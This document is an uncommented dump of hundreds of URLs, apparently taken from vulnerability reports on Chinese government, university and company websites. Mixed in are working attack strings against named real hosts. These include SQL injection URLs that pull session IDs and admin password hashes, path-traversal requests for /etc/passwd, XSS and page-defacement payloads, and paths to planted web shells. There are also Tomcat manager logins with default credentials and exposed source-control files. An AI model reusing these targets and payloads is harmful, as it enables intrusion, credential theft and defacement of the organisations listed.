inurl:BBS/index.jsp?sectionId= http://www.jcsyxx.pudong-edu.sh.cn/BBS/index.jsp?sectionId=ebbs01 http://www.nths.cn/BBS/index.jsp?sectionId=ebbs02 http://qb3z.mhedu.sh.cn/webschool/BBS/index.jsp?sectionId=ebbs01 http://zjsdszx.zje.net.cn:82/webschool/BBS/index.jsp?sectionId=ebbs02 http://218.23.208.7:8888/webschool/BBS/index.jsp?sectionId=ebbs32 http://www.goldsword.cn/ http://game.kaixin001.com/hhsh.html http://221.233.161.98:8088/manager/html http://www.zhalantun.gov.cn/bs.aspx?type=%e6%94%bf%e5%ba%9c%e9%83%a8%e9%97%a8&TIMES= url:http://www.zhalantun.gov.cn/shell.aspx http://fms.crcc.cn/ http://www.wxlibiao.com/home/?uid=10549 inurl:/dpma/FWeb/ http://bm.tangshan.gov.cn/ http://www.dlgaoji.com/newslist.aspx?colid=WebJob http://developer.wandoujia.com http://developer.wandoujia.com/.wp-config.php.swp http://220.181.167.34/_logcrawler/ http://114.66.198.56:8001/auth/login/?next=/ http://search.js.cei.gov.cn/jscredit/news.php?id=6170 http://v2014.rccms.com/mobile/member.php?m=resume&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2&d=down http://v2014.rccms.com/mobile/member.php?m=person_works&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2&d=down http://v2014.rccms.com/mobile/member.php?m=resume&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2&d=down http://v2014.rccms.com/mobile/member.php?m=resume&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2%20and%201=@`%27`%20and%201.union%20select%201,2,3,4,5,6,7,8,9%23%27&d=down http://58.213.112.250:65486/jsbm/XZXueLiXueWeiZS.aspx?type=1&userId=32669 https://sslvpn.sinopec.com/ https://crmsys.lube.sinopec.com http://www.crcc.cn/ http://w4.easou.com/ http://115.28.78.40/yhotel/login.action http://115.28.78.40/yhotel/system.jsp url:www.cnnc.com.cn http://www.cnnc.com.cn/config.aspx http://zw.xctour.com/content.aspx?ri=%2014072 http://159.226.3.199/ http://wooyun.org/bugs/wooyun-2010-049745,也有人提了SQL注入,我来找找其他的漏洞吧。去官网下BiWEB商城版最新的5.8.4来看看。 
http://pl.youku.com/.svn/entries http://ads.youku.com/.svn/entries http://211.151.146.177/.svn/entries http://211.151.146.178/.svn/entries https://147.243.230.173/rf/ https://147.243.230.173/web-console/ http://dept.wyu.edu.cn/cszx/ https://jira.foxitsoftware.cn/secure/Dashboard.jspa https://jira.foxitsoftware.cn/secure/Signup!default.jspa http://wz.xhqedu.gov.cn/Newsview.asp?id=133 http://wz.xhqedu.gov.cn/admin/login.asp http://tjl.xhqedu.gov.cn/Newsview.asp?id=106 http://tjl.xhqedu.gov.cn/admin/login.asp http://18z.xhqedu.gov.cn/NoticeView.asp?id=17 http://18z.xhqedu.gov.cn/admin/login.asp http://ysl.daqing.gov.cn/czwh.asp?ClassID=26 http://ysl.daqing.gov.cn/admin_admin.asp http://www.lylsj.gov.cn/root/zcfg/ShowContent.asp?id=1300 http://zqz.xhqedu.gov.cn/TeachView.asp?id=16 http://zqz.xhqedu.gov.cn/admin/login.asp http://www.jbsz.gov.cn/more.asp?lm_id=1 http://www.dcddwgk.gov.cn/newscontent.asp?lsh=886 http://www.dcddwgk.gov.cn/admin/login.asp http://116100.bbn.com.cn http://116100.bbn.com.cn/colorring/ringcatasearch.jsp http://159.226.251.162/ http://eps.mep.gov.cn/EPS/ https://github.com/coder-chenzhi/TestPython/blob/649f15581f02b4aa0b32c0c5b598e5586bf52518/TestPython/src/Network/sendEmail.py https://mail.zju.edu.cn http://www.xiamenair.com/Specialoffers/Detail?guid=11577bf1-8032-4eba-a725-49e0d81004d8 http://www.ntgjzgs.cn/ic.aspx?id=1314 http://114.112.70.134/ total:4835348 http://www.huafans.cn/robots.txt https://wap.wuhan.wandamoviepark.com https://wap.wuhan.wandamoviepark.com/LogIn/UpdateUserPwd/?Name=&Phone=手机号码&Pwd=新设密码 http://123.125.36.161/ ip:14.17.107.198 http://saps.sysu.edu.cn/content.asp?c=68&m=656&n=3074&todo=showinfo http://bbs.share.youku.com/robots.txt http://www.whjdsc.com/ http://www.whjdsc.com/goods_sales.php?act_id=4 http://jira.cubrid.org/secure/Dashboard.jspa http://jira.cubrid.org/secure/Signup!default.jspa http://qsjk.yundasys.com/check/index.php?bm=112009&z=82f721440fafdb0b947204acbff3d473 
http://qz.yundasys.com:7777/nbsw/wdkjtj/index.php?gs=461001&user=17164&key=183e567be0fdc31ce2cb4f554911155c# https://e.boc.cn/ocfs/more.do?type=aff&code=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%28111%29%3C/scRipt%3E&curPage=1 https://e.boc.cn/ocfs/more.do?type=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x000C70%29%3C/scRipt%3E&code=main&curPage=1 http://club.sanguosha.com/robots.txt http://bbs.xunlei.com/robots.txt http://www.ctrip.com/Community/action/08Photo/look.asp?aid=347750 http://iac.hit.edu.cn/article/printpage.asp?id=123 http://111.206.22.196:8080/login.action https://mail.iqiyi.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.iqiyi.com%2fowa http://jira.pentaho.org/secure/Dashboard.jspa http://jira.pentaho.com/secure/Signup!default.jspa http://www.jira.cn/secure/Dashboard.jspa http://www.jira.cn/secure/Signup!default.jspa http://www.zjxu.edu.cn/first/Index.aspx http://218.75.60.19:8081/cjcx_gr_login.asp http://jira.omnirom.org/secure/Dashboard.jspa http://jira.omnirom.org/secure/Signup!default.jspa http://mobile7.cn注册了开发者账号,在开发者信息---财务信息---上传证件那里 http://www.zjxu.edu.cn/first/Index.aspx http://218.75.60.19:8081/cjcx_gr_login.asp http://addon.discuz.com/?@appbyme_app.plugin http://www.appbyme.com/ http://ee.hnu.cn/eeold/php/info/detail.php?id=19376 http://www.jzwsqwj.gov.cn/qiaowu/printpage.asp?id=1886 http://www.fyhouse.net/printpage.asp?id=5800 http://www.jzkx.org.cn/xiehui/printpage.asp?id=598 http://www.jzhbj.gov.cn/jzhbj/zxcy/chuangyou/printpage.asp?id=156 http://220.249.204.131/ ip:223.4.113.109 http://ssx.so/xx http://pan.baidu.com/s/1o6skD5o,提取码:d0wu,解压密码:360poc123。 http://ahadl.org/ http://202.38.93.29//asearch.do?status=showpage&LanguageType=0 http://123.125.117.168/ http://123.125.117.168/phpmyadmin/ http://jira.xwiki.org/secure/Dashboard.jspa http://jira.xwiki.org/secure/Signup!default.jspa http://tsk.erya100.com/schoolProvinceAction http://zgsy.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 
http://cuc.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://muc.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://hhu.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://chengyi.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://ccnu.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://gxu.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://gallery.kissyui.com/api/coms?_ksTS=1404351614399_19&callback=jsonp20&len=12 http://px.ops.ikang.com/ https://px.ops.ikang.com/ url:http://61.132.81.34:80/manager/html user:admin url:http://121.8.227.12:80/manager/html user:admin inurl:hwky.wai site:12306.cn hwky.wai/index.action http://124.74.250.197/gxjf/login.jsp url:http://124.114.203.174:80/manager/html user:admin url:http://125.70.9.188:80/manager/html user:admin pass:tomcat http://demo.zoomla.cn//Common/FileService.aspx http://www.dx010.net/ http://tools.sdo.com/ http://tools.sdo.com/phpinfo.php http://tools.sdo.com/p.php#bottom http://www.furtheredu.zjb.gov.cn/showpxxm.asp?id=25 http://220.181.153.209:8080/manage/login.action url:http://58.250.25.235:80/manager/html user:admin pass:admin XXX.edu.cn/userAttributesView.portal?userId=xxxx xx.edu.cn/getBackPassword.portal进行找回密码操作 xx.edu.cn/userAttributesEdit.portal http://studytv.cctv.com:80/ http://saunion.scnu.edu.cn/ www2.scnu.edu.cn http://saunion.scnu.edu.cn/member/inc/9.php https://intl.ccb.com/FrankFurt/V1/CN/STY4/loginVN.jsp?FF_LANGUAGE=CN%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E https://api.wocloudpaas.dumpcloud.com http://finance.sbs.edu.cn/HomeDetails_Index.aspx?actionType=crule_item&actionID=44 http://210.35.72.6:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=61 http://202.121.241.222:8001/HomeDetails.aspx?actionType=ann_item&actionID=29 http://cwc.gxnu.edu.cn/homedetails_index.aspx?actiontype=crule_item&actionid=14 
http://finance2.shmtu.edu.cn:8088/homedetails_index.aspx?actiontype=work_item&actionid=129 http://www.enetedu.com/index.php/Notice/newsBulletin?ID=1047&NT=1 http://www.enetedu.com/index.php/Course2/detail?id=614 http://www.enetedu.com/index.php/Event/teachTopicC?id=14212&courseID=&courseType=2%E2%80%99 http://www.enetedu.com/index.php/Event/teachShareC?id=14237 http://www.enetedu.com/index.php/Course2/detail?id=614 http://www.enetedu.com/index.php/Event/teachTopicC?id=14212&courseID=&courseType=2%E2%80%99 http://smb.hunan.gov.cn/ http://api.my.letv.com/vcm/api/list?type=video¬ice=1&pid=40186&xid=0&mmsid=&rows=10&page=2&ifpic=n&sort=&_=1416982280016 http://www.kqtjzx.com/happy/tjshow_content.asp?id=27 http://202.104.70.3:808/active/tjshow_content.asp?id=20 http://medical.cyszxyy.com:8080/happy/tjshow_content.asp?id=7 http://bjz.yqedu.com.cn/happy/tjshow_content.asp?id=19 http://itha.nmciq.gov.cn/happy/tjshow_content.asp?id=18 http://www.wd120.com.cn:88/happy/tjshow_content.asp?id=17 http://lady.weibo.com/hiddphp.php?ac=getwb&bid=1&limit=20&page=1&type=&u=&_=1416952728705&order=1 http://mail.yto56.com.cn/ http://channel.chinanews.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://photolib.chinanews.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://sou.chinanews.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://bbs.fumu.com/forum.php http://125.88.10.244/iCloud/ url:http://125.88.10.244:80/manager/html user:tomcat pass:tomcat inurl:templet/view_0.asp?info_id= http://www.luzhoutianli.com/ https://42.120.73.5/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://www.kqtjzx.com/happy/infos_content.asp?bid=2&sid=5&id=63 http://xqxtj.com/health/infos_content.asp?bid=1&sid=2&id=54 http://218.75.210.182:12345/happy/infos_content.asp?bid=2&sid=5&id=35 http://www.xy2fytjzx.cn/happy/infos_content.asp?bid=6&sid=10&id=64 http://medical.cyszxyy.com:8080/happy/infos_content.asp?bid=3&sid=7&id=39 
http://tsljk.com/health/infos_content.asp?bid=4&sid=18&id=69 http://www.wd120.com.cn:88/happy/infos_content.asp?bid=3&sid=7&id=39 http://itha.nmciq.gov.cn/happy/infos_content.asp?bid=3&sid=7&id=189 http://218.75.210.182:12345/happy/info_s.asp?page=1&bid=1&sid=1 http://www.syyyy.cn:82/happy/info_s.asp?page=1&bid=1&sid=1 http://tsljk.com/health/info_s.asp?page=1&bid=4&sid=18 http://tjzx.hzch.gd.cn/happy/info_s.asp?page=1&bid=1&sid=2 http://xqxtj.com/health/info_s.asp?page=1&bid=1&sid=2 http://www.xy2fytjzx.cn/happy/info_s.asp?page=1&bid=1&sid=2 http://202.119.199.83:8080/jdh http://202.119.199.83/ http://202.119.199.83:8080/jdh/admin/admin!login.action http://202.119.199.83:8080/jdh/1.jsp http://202.119.199.83:8080/jdh/oen8.jsp http://web.999.com.cn/sj/pro.aspx?tiao=1 http://web.999.com.cn http://opto.hisense.com/ http://my.edu.wanfangdata.com.cn/Account/ForgetPassword http://my.edu.wanfangdata.com.cn url:http://218.17.225.88:80/manager/html user:tomcat pass:tomcat url:http://221.6.105.182:80/manager/html user:admin http://www.taizhoumsa.gov.cn/cbjk/index.asp http://www.utou.cc/Event/Content/id/111 http://www.utou.cc/Event/Content/index.php?id=111 http://www.cjs.com.cn/cjsL2/func.asp?classid=484&id=27336496 http://swj.gaoyou.gov.cn//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp http://swj.gaoyou.gov.cn//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp http://www.bzein.gov.cn/showflfg.asp?id=109 http://dept.scfai.edu.cn/ http://www.enetedu.com/index.php/Course/indexScience?&boardname=%B5%E7%C6%F8%D0%C5%CF%A2%C0%E0 http://58.248.56.116/ http://58.248.56.116/status?full=true http://58.248.56.116/zecmd/zecmd.jsp http://www.scal.com.cn/invite2011/admin/default.aspx http://www.scal.com.cn/invite2011/admin/default.aspx http://www2.zzu.edu.cn/art/NewsInfo.asp?id=258 http://a.game.3gtest.gionee.com/ http://www.haseemobile.net/index.php?act=index&app=search&brand_id=&cate_id=1 
http://xxxy.sut.edu.cn/upload/11415755046546.jsp?sort=1&dir=E%3A%5C)该脚本可访问修改目标服务器全部文件,查看网站原始代码。 http://dky.njnu.edu.cn/Search.aspx?kw=1 http://www.qlfy.org.cn/new.asp?cataid=80&id=1052 http://ufinder.duapp.com/lib/ufinder/server/ufinder.php?cmd=ls&target=/../../../../../../../../../../../ http://ufinder.duapp.com/lib/ufinder/server/ufinder.php?cmd=download&target=/../../../../../../../../../../../../../etc/passwd http://www.nduoa.com/message/noticeDetail?id=30 http://www.hbhk.com.cn/index.action http://www.gjj.gov.cn/WebSite/ChaxunLP.aspx http://www.yc51890.com/login.action http://csxy.znufe.edu.cn/htm/doc_search.aspx?keywords=1 http://wto.whu.edu.cn/Index-detail-pid-1-cpid-77-cid-4770 http://www3.ahu.edu.cn/ysxy/list_info.asp?Infoid=550 http://mall.woniu.com/mm/user/delorder http://fulltext.lib.pku.edu.cn/wasadmin/index.html http://support1.lenovo.com.cn/lenovo/wsi/admin_del/Login.aspx http://sqlmap.org http://www.nduoa.com/ http://www.nduoa.com/test78.php http://zabbix.jpush.cn http://zabbix.jpush.cn//httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 ikang.com/760312) www.ikang.com http://pj.ikang.com/ http://ops.ikang.com/phpinfo.php http://218.5.5.31:8080/frame.jsp http://sfy.njnu.edu.cn/education_info.asp?bid=&sid=80&nid=120” http://www.yjzjj.gov.cn/downfile.php?filename=../../downfile.php inurl:about.php http://www.vip-1688.com/ http://www.vip-1688.com/madminydl/admin/index.php?action=add www.portaura.com http://119.167.156.148:8080 http://119.167.156.148:8080/help/help2.html http://119.167.156.148:8081/ http://119.167.156.148:8081/uploadfiles/1.asp 
res://*/Models.ShowRoomSysDBModel.csdl|res://*/Models.ShowRoomSysDBModel.ssdl|res://*/Models.ShowRoomSysDBModel.msl;provider=System.Data.SqlClient;provider http://qzlx.ynau.edu.cn/article_Show.aspx?artID=192“ URL:http://m.yaofang.cn/user/doLogin POST:btnRegister=%E7%99%BB%E9%99%86&go=&logintype=0&password=bma123&username[]=493639943@@qq.com http://sports.njau.edu.cn:8038/video_view.php?v_id=56 http://sfy.njnu.edu.cn/student_info.asp?bid=6&sid=25&nid=4581 http://www.bdwjj.gov.cn/admin www.bdwjj.gov.cn/admin/leftFrame.php代码看看 http://www.bdwjj.gov.cn/admin/manage/new_display.php?typeid=492&borderid=459 http://58.32.246.78:8001/ http://www.youngor.com/comment.do?artid=20130301012636 http://sqlmap.org http://comp.yonyou.com/hr/sm/Sm_index.action http://comp.yonyou.com/base/par/Par_index.action http://www.sneb.com.cn/enWeb.do?method=moduleInfo&moduleId=-1+OR+17-7%3d10&newsId=6414&type=100 http://e.cic.cn/ http://e.cic.cn/web/basic/fileDownload.do?fileName=../../../../../../../../../../../etc/network/interfaces http://www.whhtz.com/about.php?classid=35 http://sqlmap.org http://www.idc.hk/ArticleList.aspx?colid=10 http://gzjyjt.cn/site/search.aspx?action=search http://116.228.70.237/ http://m.ifchange.com/u3499/user_auth/index?app=passport&jsreferer=http%3A%2F%2Fm.ifchange.com%2Fu3499%2Fpositions%2Fdetail%3Fapp%3Dcareer%26bundle%3Dbasic%26id%3D【id】%26auto_post%3Dtrue#inputmobile/new http://m.ifchange.com/u3499/user_auth/index?app=passport#inputmobile/changepwd/【用户手机号】 http://m.ifchange.com/u3499/user_auth/index?app=passport#inputmobile/changemobile http://www.libsys.com.cn/huiwen_app_center_2.php http://ebusiness.tongfangpc.com.cn/login.action?errormsg=login.error http://ulive.univs.cn/event/event/template/list/213/0.shtml http://ulive.univs.cn http://221.122.33.5:9020/ http://221.122.33.5:9020/tjsinfo/nhcrms/system/login.action http://www.ltpower.net/ http://zybj.jnu.edu.cn/ http://jpkc.gmc.edu.cn/gwsy/index.asp http://210.36.18.31/slstx/ http://glz.dgpt.edu.cn/ 
http://xxgcxy.gdut.edu.cn/user/reg.asp http://qghgxy.gdut.edu.cn/user/reg.asp http://tmjtxy.gdut.edu.cn/user/login.asp http://gsgc.gzhu.edu.cn/szgc/user/reg.asp http://nhsjd.gzhu.edu.cn/user/reg.asp http://eeit.hut.edu.cn/user/reg.asp http://glsxjd.dgpt.edu.cn/user/reg.asp http://glz.dgpt.edu.cn/user/reg.asp http://jdsxjd.dgpt.edu.cn/user/reg.asp http://etc.xmut.edu.cn/user/reg.asp http://www.zjyy.com.cn/mnwk/ http://sps.sysu.edu.cn/zsyx/ http://202.116.65.190/xhyxt/index.asp http://www.jsict.com/jsp/cmsNews/cmsNewsView.action http://oa.yto56.com.cn/C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmail&Username=test http://bme.sjtu.edu.cn/NewSelect.aspx?key=1 http://125.88.6.136/zecmd/zecmd.jsp http://125.88.6.163/zecmd/zecmd.jsp http://www.gametea.com http://wap.gf.com.cn/mobile.do?method=downLoadFile&fileName=mobile.do http://wap.gf.com.cn/mobile.do?method=downLoadFile&fileName=../web.xml http://www.vsread.com/index.php/honor/rydt/jianjie?uid=44240&t=1 http://211.151.50.93/dashboard.action http://manage.soku.com:8080/ http://szkh.gtja.com/Json/Car/CarXingDataList.aspx http://szkh.gtja.com/Login.aspx http://szkh.gtja.com/Car/CarXing.aspx http://szkh.gtja.com/Promotion/Industry.aspx http://gdkh.gtja.com http://gdkh.gtja.com/Tools/ http://gdkh.gtja.com/admin/ http://gdkh.gtja.com/uploadfiles/ http://gdkh.gtja.com/fckedit/ http://www.morefuns.com.cn/products.php对type未过滤。 http://211.146.5.63/jsp/sites/index.jsp http://211.146.5.63/jsp/sites/pxztcontent.jsp?sub_id=1 http://211.146.5.63/jsp/sites/pxztleft.jsp?keyword=1 http://211.146.5.63/jsp/sites/site?action=newsinfo&id=1&newname=?%A8%BA%A8%ACa%A1%E3??%A8%B2&newsid=1 http://211.146.5.63/jsp/sites/site?action=secondmore&newname=%CD%A8%D6%AA%B9%AB%B8%E6&subjectid=1 http://211.146.5.63/jsp/sites/site?action=secondmore&subjectid=1 http://211.146.5.63/jsp/sites/site?action=secondmore&flag=1&orderby=title&subjectid=1 www.km119net.com/web_admin/index.aspx http://www.km119net.com/upload/201307/20130704030902.doc 
test.52xinyou.cn/xykj/login.aspx http://125.35.63.11/Default.aspx http://125.35.63.11:80/ywdt/homepage/provincecodelist.aspx?DateTime=2014-09-18 http://125.35.63.11/Admin/Default.aspx http://www.quamnet.com/markethotsector.action http://tuanbai.baidu.com/apiCheckv1/?url=http://10.42.7.78 http://www.gdgz.gov.cn:8088/prms/sm/login/login!doLogout https://www.ehowbuy.com/login/login.htm?targeturl=%2Fuser%2Findex.htm,然后点击“忘记登录密码” https://trade.ehowbuy.com/account/resetpwd.htm https://trade.ehowbuy.com/account/resettxpwd.htm http://www.xjwh.gov.cn/admin http://www.xjwh.gov.cn/admin/userManagerSystem/Role/RoleDetail.aspx?ChannelID=264 http://119.147.215.26:28017/ http://www.webgobetter.com/web/index.php http://183.203.36.13:89/web/index.php http://115.28.233.30:7921/web/root http://www2.lnxjyj.com:7921/web/root http://1.93.4.40:89/web/root http://183.203.36.13:89/web/10080 http://183.203.36.13:89/web/index.php http://218.89.3.21:89/web/root http://www.bj-tofi.com:89/web/root http://121.199.29.166:89/web/root http://www.gobetter.cn/plus/list.php?tid=1 http://cwch.ahu.edu.cn/querynetweb/admin/ShowPersonRights.aspx?Gh=07139 http://210.45.92.21/admin/ShowPersonRights.aspx?Gh=001001 http://cwc.sxufe.edu.cn/KfWeb/admin/ShowPersonRights.aspx?Gh=10002888 http://210.31.114.125/KfWeb/admin/ShowPersonRights.aspx?Gh=10005888 http://58.16.80.232/kefa/admin/ShowPersonRights.aspx?Gh=198501001 http://210.45.92.20/admin/ShowPersonRights.aspx?Gh=001 http://servexpress.digitalchina.com/sms/login.asp http://servexpress.digitalchina.com http://sese.sjtu.edu.cn/DetailInfo.php?num=14&cnum=16&ID=1277 https://github.com/Dianjoy/cpa_collaction/blob/cd75778b9ea2345de9e4a20a5c8b5d6aa0fb0bf5/test/quote.html https://github.com/Dianjoy/zhuan-site/blob/master/survey/login.php http://www.strongsoft.net/ http://www.ctrip.com/Community/action/08Photo/who.asp?name= 
http://www.ctrip.com/Community/action/08Photo/who.asp?name=%22%2F%3E%3Cdiv%3E%3Cdiv+style%3D%22+width%3A1000px%3B+height%3A1000px%3B+position%3Aabsolute%3B+top%3A50%25%3B+left%3A50%25%3B+margin-left%3A-400px%3B+margin-top%3A-250px%3B+background%3Ared%3B;font-size:2cm;%22%3EHacked%20By%20CanF%3C%2Fdiv%3E http://newver.api.dedecms.com/index.php?c=info57&version=V57_GBK_SP1&phpver=5.2.3&os=WINNT&mysqlver=5.00&uptime=2013-09-22 ip:121.199.6.28 http://**.**.**/phpmyadmin/_ http://**.**.**/news_view.phpid=55注入点 http://oa.fengedu.com:8888 http://123.147.164.34:8080/default.aspx http://www.baidu.com/s?wd=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&pn=70&oq=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&ie=utf-8&rsv_pq=a65219180002c407&rsv_t=1bf6peBE4nxiKJ9IRZZHqdmHEUoE5yoanRcAf8sP1AjtIh3cHKM3bZuGPtc&rsv_page=1&f=8&rsv_bp=1&tn=baidu http://183.167.250.28:81/Public/Asp/LogValid.asp http://183.167.250.28:81/Public/Asp/LogValid.asp http://ecargo.shenzhenair.com:23454/login.aspx ip:121.199.7.120 http://benyouhui.it168.com/xml http://my.solution.it168.com/image/_svn/tmp/ http://benyouhui.it168.com/lepad/lepad.zip http://benyouhui.it168.com/beauty.zip http://benyouhui.it168.com/root.txt http://202.109.197.161/ggjg/ http://202.109.197.161/ggjg/FCKeditor/_samples/default.html http://202.109.197.161/ggjg/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://202.109.197.161/ggjg/FCKPro/Files/media/drv.asp/33.jpg http://www.rhxwl.com/Server.asp http://www.lqmyjj.com/qyzc/viewnews.asp?id=46164 http://www.linhaihome.com/qyzc/viewnews.asp?id=7466 http://www.tzmyw.com/qyzc/viewnews.asp?id=48669 http://www.xsunion.com/qyzc/viewnews.asp?id=23029 http://xc.xsunion.com/qyzc/viewnews.asp?id=23029 http://www.xjmyjj.com/qyzc/viewnews.asp?id=18641 http://www.ttmyjj.com/qyzc/viewnews.asp?id=24577 http://www.yhmyjj.com/qyzc/viewnews.asp?id=25514 http://www.jjmyjj.com/qyzc/viewnews.asp?id=18629 http://www.hyqmyjj.com/qyzc/viewnews.asp?id=41568 
http://jh.zjmy.net/qyzc/viewnews.asp?id=18597 http://www.sxpjgtmyjj.com/qyzc/viewnews.asp?id=22311 http://www.sxkfqjj.com/qyzc/viewnews.asp?id=22170 http://www.sxjhjj.com/qyzc/viewnews.asp?id=26462 http://www.lqmyjj.com/qyzc/viewnews.asp?id=46164 http://www.sxjhjj.com/qyzc/viewnews.asp?id=26462 http://oa8000.com,先登陆user普通用户,然后存在XSS的地方在网上交流,论坛的地方 http://www.cloud511.com/case http://www.smdyf.cn/getNewsDetail.do?newsID=7771 http://www.zjrrt.com/getNewsDetail.do?newsID=7263 http://www.ewj2009.com/getNewsDetail.do?newsID=7561 http://www.zjtydyf.com/getNewsDetail.do?newsID=6976 http://test.jhtht.com/getNewsDetail.do?newsID=7206 http://www.sydyf.com/getNewsDetail.do?newsID=6941 http://jylbx.com/getNewsDetail.do?newsID=6902 http://www.gxjjls.com/getNewsDetail.do?newsID=6734 http://www.hangzhoudrt.com/getNewsDetail.do?newsID=6959 http://test.hzyibai.com/getNewsDetail.do?newsID=7093 http://www.zgyb.cn/About.asp?ABOUTID=67 http://www.zgyb.cn:8080/web/device/login?lang=1 http://www.rhxwl.com/Server.asp http://www.sxpjgtmyjj.com/bszl/view.asp?id=6900 http://jh.zjmy.net/bszl/view.asp?id=6900 http://xc.xsunion.com/bszl/view.asp?id=6900 http://www.xsunion.com/bszl/view.asp?id=6900 http://17f.go5le.net/bszl/view.asp?id=23325 http://www.wooyun.org/bugs/wooyun-2014-084111/trace/e37a32c96308424eae2ea9035117c4e9这个说我提交重复了,但是你给的那个是标题地方,我这个是邮箱地方,虽说位置一样,但是插的地方不一样啊,而且他那个还有字节限制,我这个没有限制 http://demo.173cms.com http://super-nanshen.qiniudn.com/avatar_2014-11-28_54780361bdea1.jsp?f=1.txt&t=123 http://boy.super.cn/nanshen//1/index.php/Home/Index/getList?page=1&scope=global http://www.super.cn/appeal/action/appeal.txt http://zfxy.nankai.edu.cn/newsview/anounce/7247 http://economics.nankai.edu.cn/level2/ProfileNewsList.aspx?keyword=1 www.koalagogo.com/getcustomer.asp?q= http://mail.cttha.com/ http://www.cycb.com/review.do?method=col&rid=33702 www.lsol.com.cn http://www.flyhigh.com.cn http://stayliv3.github.io/2014/11/25/discuz/ http://wenku.baidu.com/static/html/v2Jump.html 
https://openapi.baidu.com/static/developer/html/v2Jump.html http://202.98.157.99/news/news.asp?classid=002002 http://hr1.wahaha.com.cn/fckeditor//editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://218.30.114.228/ http://www.scyahyez.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.sdwhys.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://abroad.nenu.edu.cn/admin/login.php http://abroad.nenu.edu.cn/plus/search.php?keyword=asa&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a www.biz198.cn:10180 http://www.66tx.cn/ https://210.162.133.131/cgi-bin/licenses.cgi https://192.195.154.239/cgi-bin/licenses.cgi https://91.217.172.181/cgi-bin/licenses.cgi https://74.219.78.212/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi https://64.62.143.195/cgi-bin/licenses.cgi https://202.147.192.105/cgi-bin/licenses.cgi https://61.120.197.38/cgi-bin/licenses.cgi https://124.93.238.176/cgi-bin/licenses.cgi https://12.219.233.49/cgi-bin/licenses.cgi https://192.195.154.243/cgi-bin/licenses.cgi https://192.195.154.242/cgi-bin/licenses.cgi https://199.26.202.34/cgi-bin/licenses.cgi https://91.217.172.227/cgi-bin/licenses.cgi https://91.217.172.230/cgi-bin/licenses.cgi https://58.65.0.250/cgi-bin/licenses.cgi https://64.62.143.195/cgi-bin/licenses.cgi 
https://72.22.9.20/cgi-bin/licenses.cgi https://72.22.9.20/cgi-bin/licenses.cgi https://12.14.47.76/cgi-bin/licenses.cgi https://72.22.9.20/cgi-bin/licenses.cgi https://12.14.47.76/cgi-bin/licenses.cgi https://72.22.9.21/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi https://91.217.172.234/cgi-bin/licenses.cgi https://137.165.4.244/cgi-bin/licenses.cgi https://195.10.115.239/cgi-bin/licenses.cgi https://219.142.74.67/cgi-bin/licenses.cgi https://81.246.0.216/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi http://mail1.coscodl.com/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN https://124.93.238.176/cgi-bin/frame.cgi?p=system_admin&a=LOGIN http://mail.infokom.net/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://mail1.coscodl.com/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://124.93.238.165/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://203.80.116.242/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN https://mailpr.coscodl.com/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN 